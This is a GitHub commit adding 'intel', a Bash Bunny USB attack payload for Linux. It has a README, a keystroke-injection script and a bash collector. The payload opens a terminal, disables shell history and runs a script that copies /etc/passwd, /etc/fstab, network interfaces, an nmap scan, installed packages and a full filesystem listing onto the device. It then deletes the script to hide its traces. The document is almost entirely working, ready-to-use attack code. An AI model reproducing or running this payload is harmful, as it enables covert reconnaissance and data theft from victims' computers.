Uploading payload "intel(intelligence)" (#501)

* Uploaded BunnyLogger

* uploading payload intel

* Create README.md

* Update README.md
This commit is contained in:
drapl0n tuxed0
2022-03-08 22:52:58 +05:30
committed by GitHub
parent 2fdb38a3b4
commit 2785fbc4db
3 changed files with 147 additions and 0 deletions

View File

@@ -0,0 +1,24 @@
# intel(intelligence)
## About:
* Title: intel
* Description: intel(intelligence) payload collects detailed information of victims machine.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Exfiltration
* Target: GNU/Linux
* Attackmodes: HID, Storage
## intel(intelligence) payload collects detailed information of victims machine.
### Workflow:
1. Prevent storing history.
2. Fetching BashBunny's block device.
3. Mounting BashBunny.
4. Transfering payload script and executing it.
5. Deleting script from victims system.
6. Unmounting BashBunny.
#### Support me if you like my work:
* https://twitter.com/drapl0n

View File

@@ -0,0 +1,67 @@
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
echo -e "*******************************************" >> $mntt/loot/intel
echo "Network Schema:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
nmap -sV localhost >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "Network Interfaces:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
ifconfig >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
ip addr >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
iwconfig >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo Storage Info: >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
findmnt >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
cat /etc/fstab >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "USB Info:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
lsusb -v >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "PCI Info:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
lspci -vvv >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "CPU Info:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
lscpu >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "Systemd services:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
systemctl list-units >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo User/groups: >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
id >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
cat /etc/passwd >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "Installed packages:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
pacman -Q >> $mntt/loot/intel || apt list --installed >> $mntt/loot/intel || dpkg -l >> $mntt/loot/intel || apk info >> $mntt/loot/intel || yum list installed >> $mntt/loot/intel || dnf list installed >> $mntt/loot/intel || zypper se --installed-only >> $mntt/loot/intel || rpm -qa >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
snap list >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
flatpak list --app >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "******************************************" >> $mntt/loot/intel
echo "Directory Structure:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
find * / >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "******************************************" >> $mntt/loot/intel

View File

@@ -0,0 +1,56 @@
# Title: intel
# Description: intel(intelligence) payload collects detailed information of victims machine.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Exfiltration
# Target: GNU/Linux operating systems.
# Attackmodes: HID, Storage.
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/intel.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/intel.sh
Q ENTER
Q STRING /tmp/./intel.sh
Q ENTER
Q DELAY 25000
Q STRING rm /tmp/intel.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH